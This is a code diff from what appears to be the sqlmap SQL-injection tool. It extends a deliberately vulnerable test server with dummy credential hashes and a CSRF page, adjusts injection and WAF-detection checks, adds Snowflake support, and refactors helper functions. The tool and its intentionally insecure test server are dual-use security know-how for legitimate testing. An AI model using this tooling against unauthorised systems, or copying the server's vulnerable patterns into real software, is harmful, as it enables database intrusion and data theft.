+    INSERT INTO creds (user_id, password_hash) VALUES (10, '3c2d1e0f9a8b7c6d5e4f30291807f6e5');
+    INSERT INTO creds (user_id, password_hash) VALUES (11, 'b0c1d2e3f405162738495a6b7c8d9eaf');
+    INSERT INTO creds (user_id, password_hash) VALUES (12, '6e5d4c3b2a190807f6e5d4c3b2a1908f');
+    INSERT INTO creds (user_id, password_hash) VALUES (13, '11223344556677889900aabbccddeeff');
+    INSERT INTO creds (user_id, password_hash) VALUES (14, 'ffeeddccbbaa00998877665544332211');
+    INSERT INTO creds (user_id, password_hash) VALUES (15, '1234567890abcdef1234567890abcdef');
+    INSERT INTO creds (user_id, password_hash) VALUES (16, 'abcdef1234567890abcdef1234567890');
+    INSERT INTO creds (user_id, password_hash) VALUES (17, '0a1b2c3d4e5f60718a9b0c1d2e3f4051');
+    INSERT INTO creds (user_id, password_hash) VALUES (18, '51f04e3d2c1b0a9871605f4e3d2c1b0a');
+    INSERT INTO creds (user_id, password_hash) VALUES (19, '89abcdef0123456789abcdef01234567');
+    INSERT INTO creds (user_id, password_hash) VALUES (20, '76543210fedcba9876543210fedcba98');
+    INSERT INTO creds (user_id, password_hash) VALUES (21, '13579bdf2468ace013579bdf2468ace0');
+    INSERT INTO creds (user_id, password_hash) VALUES (22, '02468ace13579bdf02468ace13579bdf');
+    INSERT INTO creds (user_id, password_hash) VALUES (23, 'deadbeefdeadbeefdeadbeefdeadbeef');
+    INSERT INTO creds (user_id, password_hash) VALUES (24, 'cafebabecafebabecafebabecafebabe');
+    INSERT INTO creds (user_id, password_hash) VALUES (25, '00112233445566778899aabbccddeeff');
+    INSERT INTO creds (user_id, password_hash) VALUES (26, 'f0e1d2c3b4a5968778695a4b3c2d1e0f');
+    INSERT INTO creds (user_id, password_hash) VALUES (27, '7f6e5d4c3b2a190807f6e5d4c3b2a190');
+    INSERT INTO creds (user_id, password_hash) VALUES (28, '908f7e6d5c4b3a291807f6e5d4c3b2a1');
+    INSERT INTO creds (user_id, password_hash) VALUES (29, '3049b791fa83e2f42f37bae18634b92d');
+    INSERT INTO creds (user_id, password_hash) VALUES (30, 'd59a348f90d757c7da30418773424b5e');
 """
 
 LISTEN_ADDRESS = "localhost"
@@ -62,11 +125,15 @@ _cursor = None
 _lock = None
 _server = None
 _alive = False
+_csrf_token = None
 
 def init(quiet=False):
     global _conn
     global _cursor
     global _lock
+    global _csrf_token
+
+    _csrf_token = "".join(random.sample(string.ascii_letters + string.digits, 20))
 
     _conn = sqlite3.connect(":memory:", isolation_level=None, check_same_thread=False)
     _cursor = _conn.cursor()
@@ -131,6 +198,28 @@ class ReqHandler(BaseHTTPRequestHandler):
 
         self.url, self.params = path, params
 
+        if self.url == "/csrf":
+            if self.params.get("csrf_token") == _csrf_token:
+                self.url = "/"
+            else:
+                self.send_response(OK)
+                self.send_header("Content-type", "text/html; charset=%s" % UNICODE_ENCODING)
+                self.end_headers()
+
+                form = (
+                    "<html><body>"
+                    "CSRF protection check<br>"
+                    "<form action='/csrf' method='POST'>"
+                    "<input type='hidden' name='csrf_token' value='%s'>"
+                    "id: <input type='text' name='id'>"
+                    "<input type='submit' value='Submit'>"
+                    "</form>"
+                    "</body></html>"
+                ) % _csrf_token
+
+                self.wfile.write(form.encode(UNICODE_ENCODING))
+                return
+
         if self.url == '/':
             if not any(_ in self.params for _ in ("id", "query")):
                 self.send_response(OK)
@@ -139,7 +228,7 @@ class ReqHandler(BaseHTTPRequestHandler):
                 self.end_headers()
                 self.wfile.write(b"<!DOCTYPE html><html><head><title>vulnserver</title></head><body><h3>GET:</h3><a href='/?id=1'>link</a><hr><h3>POST:</h3><form method='post'>ID: <input type='text' name='id'><input type='submit' value='Submit'></form></body></html>")
             else:
-                code, output = OK, ""
+                code, output = OK, "<body><html>"
 
                 try:
                     if self.params.get("echo", ""):
@@ -177,6 +266,11 @@ class ReqHandler(BaseHTTPRequestHandler):
                         else:
                             output += "no results found"
 
+                        if not results:
+                            output = "<title>No results</title>" + output
+                        else:
+                            output = "<title>Results</title>" + output
+
                     output += "</body></html>"
                 except Exception as ex:
                     code = INTERNAL_SERVER_ERROR

lib/controller/checks.py

@@ -554,7 +554,7 @@ def checkSqlInjection(place, parameter, value):
 
                                     injectable = True
 
-                                elif (threadData.lastComparisonRatio or 0) > UPPER_RATIO_BOUND and not any((conf.string, conf.notString, conf.regexp, conf.code, kb.nullConnection)):
+                                elif (threadData.lastComparisonRatio or 0) > UPPER_RATIO_BOUND and not any((conf.string, conf.notString, conf.regexp, conf.code, conf.titles, kb.nullConnection)):
                                     originalSet = set(getFilteredPageContent(kb.pageTemplate, True, "\n").split("\n"))
                                     trueSet = set(getFilteredPageContent(truePage, True, "\n").split("\n"))
                                     falseSet = set(getFilteredPageContent(falsePage, True, "\n").split("\n"))
@@ -580,7 +580,7 @@ def checkSqlInjection(place, parameter, value):
                                                     break
 
                             if injectable:
-                                if kb.pageStable and not any((conf.string, conf.notString, conf.regexp, conf.code, kb.nullConnection)):
+                                if kb.pageStable and not any((conf.string, conf.notString, conf.regexp, conf.code, conf.titles, kb.nullConnection)):
                                     if all((falseCode, trueCode)) and falseCode != trueCode and trueCode != kb.heuristicCode:
                                         suggestion = conf.code = trueCode
 
@@ -1377,6 +1377,7 @@ def checkWaf():
     kb.choices.redirect = REDIRECTION.YES
     kb.resendPostOnRedirect = False
     conf.timeout = IPS_WAF_CHECK_TIMEOUT
+    kb.checkWafMode = True
 
     try:
         retVal = (Request.queryPage(place=place, value=value, getRatioValue=True, noteResponseTime=False, silent=True, raise404=False, disableTampering=True)[1] or 0) < IPS_WAF_CHECK_RATIO
@@ -1384,6 +1385,7 @@ def checkWaf():
         retVal = True
     finally:
         kb.matchRatio = None
+        kb.checkWafMode = False
 
         conf.timeout = popValue()
         kb.resendPostOnRedirect = popValue()

lib/controller/handler.py

@@ -41,64 +41,38 @@ from lib.core.settings import SQLITE_ALIASES
 from lib.core.settings import SYBASE_ALIASES
 from lib.core.settings import VERTICA_ALIASES
 from lib.core.settings import VIRTUOSO_ALIASES
+from lib.core.settings import SNOWFLAKE_ALIASES
 from lib.utils.sqlalchemy import SQLAlchemy
 
-from plugins.dbms.access.connector import Connector as AccessConn
 from plugins.dbms.access import AccessMap
-from plugins.dbms.altibase.connector import Connector as AltibaseConn
 from plugins.dbms.altibase import AltibaseMap
-from plugins.dbms.cache.connector import Connector as CacheConn
 from plugins.dbms.cache import CacheMap
-from plugins.dbms.clickhouse.connector import Connector as ClickHouseConn
 from plugins.dbms.clickhouse import ClickHouseMap
-from plugins.dbms.cratedb.connector import Connector as CrateDBConn
 from plugins.dbms.cratedb import CrateDBMap
-from plugins.dbms.cubrid.connector import Connector as CubridConn
 from plugins.dbms.cubrid import CubridMap
-from plugins.dbms.db2.connector import Connector as DB2Conn
 from plugins.dbms.db2 import DB2Map
-from plugins.dbms.derby.connector import Connector as DerbyConn
 from plugins.dbms.derby import DerbyMap
-from plugins.dbms.extremedb.connector import Connector as ExtremeDBConn
 from plugins.dbms.extremedb import ExtremeDBMap
-from plugins.dbms.firebird.connector import Connector as FirebirdConn
 from plugins.dbms.firebird import FirebirdMap
-from plugins.dbms.frontbase.connector import Connector as FrontBaseConn
 from plugins.dbms.frontbase import FrontBaseMap
-from plugins.dbms.h2.connector import Connector as H2Conn
 from plugins.dbms.h2 import H2Map
-from plugins.dbms.hsqldb.connector import Connector as HSQLDBConn
 from plugins.dbms.hsqldb import HSQLDBMap
-from plugins.dbms.informix.connector import Connector as InformixConn
 from plugins.dbms.informix import InformixMap
-from plugins.dbms.maxdb.connector import Connector as MaxDBConn
 from plugins.dbms.maxdb import MaxDBMap
-from plugins.dbms.mckoi.connector import Connector as MckoiConn
 from plugins.dbms.mckoi import MckoiMap
-from plugins.dbms.mimersql.connector import Connector as MimerSQLConn
 from plugins.dbms.mimersql import MimerSQLMap
-from plugins.dbms.monetdb.connector import Connector as MonetDBConn
 from plugins.dbms.monetdb import MonetDBMap
-from plugins.dbms.mssqlserver.connector import Connector as MSSQLServerConn
 from plugins.dbms.mssqlserver import MSSQLServerMap
-from plugins.dbms.mysql.connector import Connector as MySQLConn
 from plugins.dbms.mysql import MySQLMap
-from plugins.dbms.oracle.connector import Connector as OracleConn
 from plugins.dbms.oracle import OracleMap
-from plugins.dbms.postgresql.connector import Connector as PostgreSQLConn
 from plugins.dbms.postgresql import PostgreSQLMap
-from plugins.dbms.presto.connector import Connector as PrestoConn
 from plugins.dbms.presto import PrestoMap
-from plugins.dbms.raima.connector import Connector as RaimaConn
 from plugins.dbms.raima import RaimaMap
-from plugins.dbms.sqlite.connector import Connector as SQLiteConn
 from plugins.dbms.sqlite import SQLiteMap
-from plugins.dbms.sybase.connector import Connector as SybaseConn
 from plugins.dbms.sybase import SybaseMap
-from plugins.dbms.vertica.connector import Connector as VerticaConn
 from plugins.dbms.vertica import VerticaMap
-from plugins.dbms.virtuoso.connector import Connector as VirtuosoConn
 from plugins.dbms.virtuoso import VirtuosoMap
+from plugins.dbms.snowflake import SnowflakeMap
 
 def setHandler():
     """
@@ -107,34 +81,35 @@ def setHandler():
     """
 
     items = [
-        (DBMS.MYSQL, MYSQL_ALIASES, MySQLMap, MySQLConn),
+        (DBMS.MYSQL, MYSQL_ALIASES, MySQLMap, "plugins.dbms.mysql.connector"),
-        (DBMS.ORACLE, ORACLE_ALIASES, OracleMap, OracleConn),
+        (DBMS.ORACLE, ORACLE_ALIASES, OracleMap, "plugins.dbms.oracle.connector"),
-        (DBMS.PGSQL, PGSQL_ALIASES, PostgreSQLMap, PostgreSQLConn),
+        (DBMS.PGSQL, PGSQL_ALIASES, PostgreSQLMap, "plugins.dbms.postgresql.connector"),
-        (DBMS.MSSQL, MSSQL_ALIASES, MSSQLServerMap, MSSQLServerConn),
+        (DBMS.MSSQL, MSSQL_ALIASES, MSSQLServerMap, "plugins.dbms.mssqlserver.connector"),
-        (DBMS.SQLITE, SQLITE_ALIASES, SQLiteMap, SQLiteConn),
+        (DBMS.SQLITE, SQLITE_ALIASES, SQLiteMap, "plugins.dbms.sqlite.connector"),
-        (DBMS.ACCESS, ACCESS_ALIASES, AccessMap, AccessConn),
+        (DBMS.ACCESS, ACCESS_ALIASES, AccessMap, "plugins.dbms.access.connector"),
-        (DBMS.FIREBIRD, FIREBIRD_ALIASES, FirebirdMap, FirebirdConn),
+        (DBMS.FIREBIRD, FIREBIRD_ALIASES, FirebirdMap, "plugins.dbms.firebird.connector"),
-        (DBMS.MAXDB, MAXDB_ALIASES, MaxDBMap, MaxDBConn),
+        (DBMS.MAXDB, MAXDB_ALIASES, MaxDBMap, "plugins.dbms.maxdb.connector"),
-        (DBMS.SYBASE, SYBASE_ALIASES, SybaseMap, SybaseConn),
+        (DBMS.SYBASE, SYBASE_ALIASES, SybaseMap, "plugins.dbms.sybase.connector"),
-        (DBMS.DB2, DB2_ALIASES, DB2Map, DB2Conn),
+        (DBMS.DB2, DB2_ALIASES, DB2Map, "plugins.dbms.db2.connector"),
-        (DBMS.HSQLDB, HSQLDB_ALIASES, HSQLDBMap, HSQLDBConn),
+        (DBMS.HSQLDB, HSQLDB_ALIASES, HSQLDBMap, "plugins.dbms.hsqldb.connector"),
-        (DBMS.H2, H2_ALIASES, H2Map, H2Conn),
+        (DBMS.H2, H2_ALIASES, H2Map, "plugins.dbms.h2.connector"),
-        (DBMS.INFORMIX, INFORMIX_ALIASES, InformixMap, InformixConn),
+        (DBMS.INFORMIX, INFORMIX_ALIASES, InformixMap, "plugins.dbms.informix.connector"),
-        (DBMS.MONETDB, MONETDB_ALIASES, MonetDBMap, MonetDBConn),
+        (DBMS.MONETDB, MONETDB_ALIASES, MonetDBMap, "plugins.dbms.monetdb.connector"),
-        (DBMS.DERBY, DERBY_ALIASES, DerbyMap, DerbyConn),
+        (DBMS.DERBY, DERBY_ALIASES, DerbyMap, "plugins.dbms.derby.connector"),
-        (DBMS.VERTICA, VERTICA_ALIASES, VerticaMap, VerticaConn),
+        (DBMS.VERTICA, VERTICA_ALIASES, VerticaMap, "plugins.dbms.vertica.connector"),
-        (DBMS.MCKOI, MCKOI_ALIASES, MckoiMap, MckoiConn),
+        (DBMS.MCKOI, MCKOI_ALIASES, MckoiMap, "plugins.dbms.mckoi.connector"),
-        (DBMS.PRESTO, PRESTO_ALIASES, PrestoMap, PrestoConn),
+        (DBMS.PRESTO, PRESTO_ALIASES, PrestoMap, "plugins.dbms.presto.connector"),
-        (DBMS.ALTIBASE, ALTIBASE_ALIASES, AltibaseMap, AltibaseConn),
+        (DBMS.ALTIBASE, ALTIBASE_ALIASES, AltibaseMap, "plugins.dbms.altibase.connector"),
-        (DBMS.MIMERSQL, MIMERSQL_ALIASES, MimerSQLMap, MimerSQLConn),
+        (DBMS.MIMERSQL, MIMERSQL_ALIASES, MimerSQLMap, "plugins.dbms.mimersql.connector"),
-        (DBMS.CLICKHOUSE, CLICKHOUSE_ALIASES, ClickHouseMap, ClickHouseConn),
+        (DBMS.CLICKHOUSE, CLICKHOUSE_ALIASES, ClickHouseMap, "plugins.dbms.clickhouse.connector"),
-        (DBMS.CRATEDB, CRATEDB_ALIASES, CrateDBMap, CrateDBConn),
+        (DBMS.CRATEDB, CRATEDB_ALIASES, CrateDBMap, "plugins.dbms.cratedb.connector"),
-        (DBMS.CUBRID, CUBRID_ALIASES, CubridMap, CubridConn),
+        (DBMS.CUBRID, CUBRID_ALIASES, CubridMap, "plugins.dbms.cubrid.connector"),
-        (DBMS.CACHE, CACHE_ALIASES, CacheMap, CacheConn),
+        (DBMS.CACHE, CACHE_ALIASES, CacheMap, "plugins.dbms.cache.connector"),
-        (DBMS.EXTREMEDB, EXTREMEDB_ALIASES, ExtremeDBMap, ExtremeDBConn),
+        (DBMS.EXTREMEDB, EXTREMEDB_ALIASES, ExtremeDBMap, "plugins.dbms.extremedb.connector"),
-        (DBMS.FRONTBASE, FRONTBASE_ALIASES, FrontBaseMap, FrontBaseConn),
+        (DBMS.FRONTBASE, FRONTBASE_ALIASES, FrontBaseMap, "plugins.dbms.frontbase.connector"),
-        (DBMS.RAIMA, RAIMA_ALIASES, RaimaMap, RaimaConn),
+        (DBMS.RAIMA, RAIMA_ALIASES, RaimaMap, "plugins.dbms.raima.connector"),
-        (DBMS.VIRTUOSO, VIRTUOSO_ALIASES, VirtuosoMap, VirtuosoConn),
+        (DBMS.VIRTUOSO, VIRTUOSO_ALIASES, VirtuosoMap, "plugins.dbms.virtuoso.connector"),
+        (DBMS.SNOWFLAKE, SNOWFLAKE_ALIASES, SnowflakeMap, "plugins.dbms.snowflake.connector"),
     ]
 
     _ = max(_ if (conf.get("dbms") or Backend.getIdentifiedDbms() or kb.heuristicExtendedDbms or "").lower() in _[1] else () for _ in items)
@@ -142,7 +117,7 @@ def setHandler():
         items.remove(_)
         items.insert(0, _)
 
-    for dbms, aliases, Handler, Connector in items:
+    for dbms, aliases, Handler, connector in items:
         if conf.forceDbms:
             if conf.forceDbms.lower() not in aliases:
                 continue
@@ -154,9 +129,12 @@ def setHandler():
                 continue
 
         handler = Handler()
-        conf.dbmsConnector = Connector()
+        conf.dbmsConnector = None
 
         if conf.direct:
+            _ = __import__(connector, fromlist=['Connector'])
+            conf.dbmsConnector = _.Connector()
+
             exception = None
             dialect = DBMS_DICT[dbms][3]
 

lib/core/agent.py

@@ -724,7 +724,7 @@ class Agent(object):
             elif fieldsNoSelect:
                 concatenatedQuery = "CONCAT('%s',%s,'%s')" % (kb.chars.start, concatenatedQuery, kb.chars.stop)
 
-        elif Backend.getIdentifiedDbms() in (DBMS.PGSQL, DBMS.ORACLE, DBMS.SQLITE, DBMS.DB2, DBMS.FIREBIRD, DBMS.HSQLDB, DBMS.H2, DBMS.MONETDB, DBMS.DERBY, DBMS.VERTICA, DBMS.MCKOI, DBMS.PRESTO, DBMS.ALTIBASE, DBMS.MIMERSQL, DBMS.CRATEDB, DBMS.CUBRID, DBMS.CACHE, DBMS.EXTREMEDB, DBMS.FRONTBASE, DBMS.RAIMA, DBMS.VIRTUOSO):
+        elif Backend.getIdentifiedDbms() in (DBMS.PGSQL, DBMS.ORACLE, DBMS.SQLITE, DBMS.DB2, DBMS.FIREBIRD, DBMS.HSQLDB, DBMS.H2, DBMS.MONETDB, DBMS.DERBY, DBMS.VERTICA, DBMS.MCKOI, DBMS.PRESTO, DBMS.ALTIBASE, DBMS.MIMERSQL, DBMS.CRATEDB, DBMS.CUBRID, DBMS.CACHE, DBMS.EXTREMEDB, DBMS.FRONTBASE, DBMS.RAIMA, DBMS.VIRTUOSO, DBMS.SNOWFLAKE):
             if fieldsExists:
                 concatenatedQuery = concatenatedQuery.replace("SELECT ", "'%s'||" % kb.chars.start, 1)
                 concatenatedQuery += "||'%s'" % kb.chars.stop
@@ -1045,7 +1045,7 @@ class Agent(object):
             limitStr = queries[Backend.getIdentifiedDbms()].limit.query % (num, 1)
             limitedQuery += " %s" % limitStr
 
-        elif Backend.getIdentifiedDbms() in (DBMS.H2, DBMS.CRATEDB, DBMS.CLICKHOUSE):
+        elif Backend.getIdentifiedDbms() in (DBMS.H2, DBMS.CRATEDB, DBMS.CLICKHOUSE, DBMS.SNOWFLAKE):
             limitStr = queries[Backend.getIdentifiedDbms()].limit.query % (1, num)
             limitedQuery += " %s" % limitStr
 

lib/core/bigarray.py

@@ -93,6 +93,10 @@ class BigArray(list):
     >>> _ = __
     >>> _[-1]
     1
+    >>> _.pop()
+    1
+    >>> len(_)
+    100001
     >>> len([_ for _ in BigArray(xrange(100000))])
     100000
     """
@@ -148,8 +152,11 @@ class BigArray(list):
             if not self.chunks[-1] and len(self.chunks) > 1:
                 self.chunks.pop()
                 try:
-                    with open(self.chunks[-1], "rb") as f:
+                    filename = self.chunks[-1]
+                    with open(filename, "rb") as f:
                         self.chunks[-1] = pickle.loads(zlib.decompress(f.read()))
+                    self._os_remove(filename)
+                    self.filenames.discard(filename)
                 except IOError as ex:
                     errMsg = "exception occurred while retrieving data "
                     errMsg += "from a temporary file ('%s')" % ex
@@ -187,8 +194,7 @@ class BigArray(list):
         try:
             handle, filename = tempfile.mkstemp(prefix=MKSTEMP_PREFIX.BIG_ARRAY)
             self.filenames.add(filename)
-            os.close(handle)
+            with os.fdopen(handle, "w+b") as f:
-            with open(filename, "w+b") as f:
                 f.write(zlib.compress(pickle.dumps(chunk, pickle.HIGHEST_PROTOCOL), BIGARRAY_COMPRESS_LEVEL))
             return filename
         except (OSError, IOError) as ex:
@@ -305,11 +311,29 @@ class BigArray(list):
         return "%s%s" % ("..." if len(self.chunks) > 1 else "", self.chunks[-1].__repr__())
 
     def __iter__(self):
-        for i in xrange(len(self)):
+        with self._lock:
-            try:
+            chunks = list(self.chunks)
-                yield self[i]
+            cache_index = self.cache.index if isinstance(self.cache, Cache) else None
-            except IndexError:
+            cache_data = self.cache.data if isinstance(self.cache, Cache) else None
-                break
+
+        for idx, chunk in enumerate(chunks):
+            if isinstance(chunk, list):
+                for item in chunk:
+                    yield item
+            else:
+                try:
+                    if cache_index == idx and cache_data is not None:
+                        data = cache_data
+                    else:
+                        with open(chunk, "rb") as f:
+                            data = pickle.loads(zlib.decompress(f.read()))
+                except Exception as ex:
+                    errMsg = "exception occurred while retrieving data "
+                    errMsg += "from a temporary file ('%s')" % ex
+                    raise SqlmapSystemException(errMsg)
+
+                for item in data:
+                    yield item
 
     def __len__(self):
         return len(self.chunks[-1]) if len(self.chunks) == 1 else (len(self.chunks) - 1) * self.chunk_length + len(self.chunks[-1])

lib/core/common.py

@@ -463,11 +463,11 @@ class Backend(object):
     @staticmethod
     def setArch():
         msg = "what is the back-end database management system architecture?"
-        msg += "\n[1] 32-bit (default)"
+        msg += "\n[1] 32-bit"
-        msg += "\n[2] 64-bit"
+        msg += "\n[2] 64-bit (default)"
 
         while True:
-            choice = readInput(msg, default='1')
+            choice = readInput(msg, default='2')
 
             if hasattr(choice, "isdigit") and choice.isdigit() and int(choice) in (1, 2):
                 kb.arch = 32 if int(choice) == 1 else 64
@@ -1411,7 +1411,7 @@ def parseJson(content):
     """
     This function parses POST_HINT.JSON and POST_HINT.JSON_LIKE content
 
-    >>> parseJson("{'id':1}")["id"] == 1
+    >>> parseJson("{'id':1, 'foo':[2,3,4]}")["id"] == 1
     True
     >>> parseJson('{"id":1}')["id"] == 1
     True
@@ -1429,10 +1429,10 @@ def parseJson(content):
         if quote == '"':
             retVal = json.loads(content)
         elif quote == "'":
-            content = content.replace('"', '\\"')
+            def _(match):
-            content = content.replace("\\'", BOUNDARY_BACKSLASH_MARKER)
+                return '"%s"' % match.group(1).replace('"', '\\"')
-            content = content.replace("'", '"')
+
-            content = content.replace(BOUNDARY_BACKSLASH_MARKER, "'")
+            content = re.sub(r"'((?:[^'\\]|\\.)*)'", _, content)
             retVal = json.loads(content)
     except:
         pass
@@ -1477,10 +1477,18 @@ def cleanQuery(query):
     """
 
     retVal = query
+    queryLower = query.lower()
 
     for sqlStatements in SQL_STATEMENTS.values():
         for sqlStatement in sqlStatements:
             candidate = sqlStatement.replace("(", "").replace(")", "").strip()
+
+            # OPTIMIZATION: Skip expensive regex compilation/search if the keyword
+            # isn't even present in the string. This makes the function O(K) instead of O(N*K)
+            # for the expensive regex part (where K is num keywords).
+            if not candidate or candidate.lower() not in queryLower:
+                continue
+
             queryMatch = re.search(r"(?i)\b(%s)\b" % candidate, query)
 
             if queryMatch and "sys_exec" not in query:
@@ -2065,7 +2073,7 @@ def getCharset(charsetType=None):
 
     # Digits
     elif charsetType == CHARSET_TYPE.DIGITS:
-        asciiTbl.extend((0, 9))
+        asciiTbl.extend(xrange(0, 10))
         asciiTbl.extend(xrange(47, 58))
 
     # Hexadecimal
@@ -2465,7 +2473,7 @@ def getSQLSnippet(dbms, sfile, **variables):
 
     return retVal
 
-def readCachedFileContent(filename, mode="rb"):
+def readCachedFileContent(filename, mode='r'):
     """
     Cached reading of file content (avoiding multiple same file reading)
 
@@ -2923,22 +2931,15 @@ def findMultipartPostBoundary(post):
     """
 
     retVal = None
-
+    counts = {}
-    done = set()
-    candidates = []
 
     for match in re.finditer(r"(?m)^--(.+?)(--)?$", post or ""):
-        _ = match.group(1).strip().strip('-')
+        boundary = match.group(1).strip().strip('-')
+        counts[boundary] = counts.get(boundary, 0) + 1
 
-        if _ in done:
+    if counts:
-            continue
+        sorted_boundaries = sorted(counts.items(), key=lambda x: x[1], reverse=True)
-        else:
+        retVal = sorted_boundaries[0][0]
-            candidates.append((post.count(_), _))
-            done.add(_)
-
-    if candidates:
-        candidates.sort(key=lambda _: _[0], reverse=True)
-        retVal = candidates[0][1]
 
     return retVal
 
@@ -3461,7 +3462,10 @@ def parseSqliteTableSchema(value):
             columns[column] = match.group(3) or "TEXT"
 
         table[safeSQLIdentificatorNaming(conf.tbl, True)] = columns
-        kb.data.cachedColumns[conf.db] = table
+        if conf.db in kb.data.cachedColumns:
+            kb.data.cachedColumns[conf.db].update(table)
+        else:
+            kb.data.cachedColumns[conf.db] = table
 
     return retVal
 
@@ -3606,7 +3610,7 @@ def saveConfig(conf, filename):
 
             config.set(family, option, value)
 
-    with openFile(filename, "wb") as f:
+    with openFile(filename, 'w') as f:
         try:
             config.write(f)
         except IOError as ex:
@@ -3812,6 +3816,7 @@ def openFile(filename, mode='r', encoding=UNICODE_ENCODING, errors="reversible",
     # Reference: https://stackoverflow.com/a/37462452
     if 'b' in mode:
         buffering = 0
+        encoding = None
 
     if filename == STDIN_PIPE_DASH:
         if filename not in kb.cache.content:
@@ -4019,7 +4024,7 @@ def createGithubIssue(errMsg, excMsg):
             logger.info(infoMsg)
 
             try:
-                with openFile(paths.GITHUB_HISTORY, "a+b") as f:
+                with openFile(paths.GITHUB_HISTORY, "a+") as f:
                     f.write("%s\n" % key)
             except:
                 pass
@@ -4291,7 +4296,7 @@ def safeSQLIdentificatorNaming(name, isTable=False):
 
                 if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.ACCESS, DBMS.CUBRID, DBMS.SQLITE):  # Note: in SQLite double-quotes are treated as string if column/identifier is non-existent (e.g. SELECT "foobar" FROM users)
                     retVal = "`%s`" % retVal
-                elif Backend.getIdentifiedDbms() in (DBMS.PGSQL, DBMS.DB2, DBMS.HSQLDB, DBMS.H2, DBMS.INFORMIX, DBMS.MONETDB, DBMS.VERTICA, DBMS.MCKOI, DBMS.PRESTO, DBMS.CRATEDB, DBMS.CACHE, DBMS.EXTREMEDB, DBMS.FRONTBASE, DBMS.RAIMA, DBMS.VIRTUOSO):
+                elif Backend.getIdentifiedDbms() in (DBMS.PGSQL, DBMS.DB2, DBMS.HSQLDB, DBMS.H2, DBMS.INFORMIX, DBMS.MONETDB, DBMS.VERTICA, DBMS.MCKOI, DBMS.PRESTO, DBMS.CRATEDB, DBMS.CACHE, DBMS.EXTREMEDB, DBMS.FRONTBASE, DBMS.RAIMA, DBMS.VIRTUOSO, DBMS.SNOWFLAKE):
                     retVal = "\"%s\"" % retVal
                 elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.ALTIBASE, DBMS.MIMERSQL):
                     retVal = "\"%s\"" % retVal.upper()
@@ -4330,7 +4335,7 @@ def unsafeSQLIdentificatorNaming(name):
     if isinstance(name, six.string_types):
         if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.ACCESS, DBMS.CUBRID, DBMS.SQLITE):
             retVal = name.replace("`", "")
-        elif Backend.getIdentifiedDbms() in (DBMS.PGSQL, DBMS.DB2, DBMS.HSQLDB, DBMS.H2, DBMS.INFORMIX, DBMS.MONETDB, DBMS.VERTICA, DBMS.MCKOI, DBMS.PRESTO, DBMS.CRATEDB, DBMS.CACHE, DBMS.EXTREMEDB, DBMS.FRONTBASE, DBMS.RAIMA, DBMS.VIRTUOSO):
+        elif Backend.getIdentifiedDbms() in (DBMS.PGSQL, DBMS.DB2, DBMS.HSQLDB, DBMS.H2, DBMS.INFORMIX, DBMS.MONETDB, DBMS.VERTICA, DBMS.MCKOI, DBMS.PRESTO, DBMS.CRATEDB, DBMS.CACHE, DBMS.EXTREMEDB, DBMS.FRONTBASE, DBMS.RAIMA, DBMS.VIRTUOSO, DBMS.SNOWFLAKE):
             retVal = name.replace("\"", "")
         elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.ALTIBASE, DBMS.MIMERSQL):
             retVal = name.replace("\"", "").upper()
@@ -4515,34 +4520,32 @@ def randomizeParameterValue(value):
 
     retVal = value
 
-    value = re.sub(r"%[0-9a-fA-F]{2}", "", value)
+    retVal = re.sub(r"%[0-9a-fA-F]{2}", "", retVal)
 
-    for match in re.finditer(r"[A-Z]+", value):
+    def _replace_upper(match):
+        original = match.group()
         while True:
-            original = match.group()
+            candidate = randomStr(len(original)).upper()
-            candidate = randomStr(len(match.group())).upper()
+            if candidate != original:
-            if original != candidate:
+                return candidate
-                break
 
-        retVal = retVal.replace(original, candidate)
+    def _replace_lower(match):
-
+        original = match.group()
-    for match in re.finditer(r"[a-z]+", value):
         while True:
-            original = match.group()
+            candidate = randomStr(len(original)).lower()
-            candidate = randomStr(len(match.group())).lower()
+            if candidate != original:
-            if original != candidate:
+                return candidate
-                break
 
-        retVal = retVal.replace(original, candidate)
+    def _replace_digit(match):
-
+        original = match.group()
-    for match in re.finditer(r"[0-9]+", value):
         while True:
-            original = match.group()
+            candidate = str(randomInt(len(original)))
-            candidate = str(randomInt(len(match.group())))
+            if candidate != original:
-            if original != candidate:
+                return candidate
-                break
 
-        retVal = retVal.replace(original, candidate, 1)
+    retVal = re.sub(r"[A-Z]+", _replace_upper, retVal)
+    retVal = re.sub(r"[a-z]+", _replace_lower, retVal)
+    retVal = re.sub(r"[0-9]+", _replace_digit, retVal)
 
     if re.match(r"\A[^@]+@.+\.[a-z]+\Z", value):
         parts = retVal.split('.')
@@ -4808,7 +4811,17 @@ def checkSameHost(*urls):
                 value = "http://%s" % value
             return value
 
-        return all(re.sub(r"(?i)\Awww\.", "", _urllib.parse.urlparse(_(url) or "").netloc.split(':')[0]) == re.sub(r"(?i)\Awww\.", "", _urllib.parse.urlparse(_(urls[0]) or "").netloc.split(':')[0]) for url in urls[1:])
+        first = _urllib.parse.urlparse(_(urls[0]) or "").hostname or ""
+        first = re.sub(r"(?i)\Awww\.", "", first)
+
+        for url in urls[1:]:
+            current = _urllib.parse.urlparse(_(url) or "").hostname or ""
+            current = re.sub(r"(?i)\Awww\.", "", current)
+
+            if current != first:
+                return False
+
+        return True
 
 def getHostHeader(url):
     """
@@ -5100,7 +5113,7 @@ def resetCookieJar(cookieJar):
                 os.close(handle)
 
                 # Reference: http://www.hashbangcode.com/blog/netscape-http-cooke-file-parser-php-584.html
-                with openFile(filename, "w+b") as f:
+                with openFile(filename, "w+") as f:
                     f.write("%s\n" % NETSCAPE_FORMAT_HEADER_COOKIES)
                     for line in lines:
                         _ = line.split("\t")
@@ -5163,10 +5176,12 @@ def prioritySortColumns(columns):
     ['id', 'userid', 'name', 'password']
     """
 
-    def _(column):
+    recompile = re.compile(r"^id|id$", re.I)
-        return column and re.search(r"^id|id$", column, re.I) is not None
 
-    return sorted(sorted(columns, key=len), key=functools.cmp_to_key(lambda x, y: -1 if _(x) and not _(y) else 1 if not _(x) and _(y) else 0))
+    return sorted(columns, key=lambda col: (
+        not (col and recompile.search(col)),
+        len(col)
+    ))
 
 def getRequestHeader(request, name):
     """
@@ -5565,6 +5580,7 @@ def removePostHintPrefix(value):
 
     return re.sub(r"\A(%s) " % '|'.join(re.escape(__) for __ in getPublicTypeMembers(POST_HINT, onlyValues=True)), "", value)
 
+
 def chunkSplitPostData(data):
     """
     Convert POST data to chunked transfer-encoded data (Note: splitting done by SQL keywords)
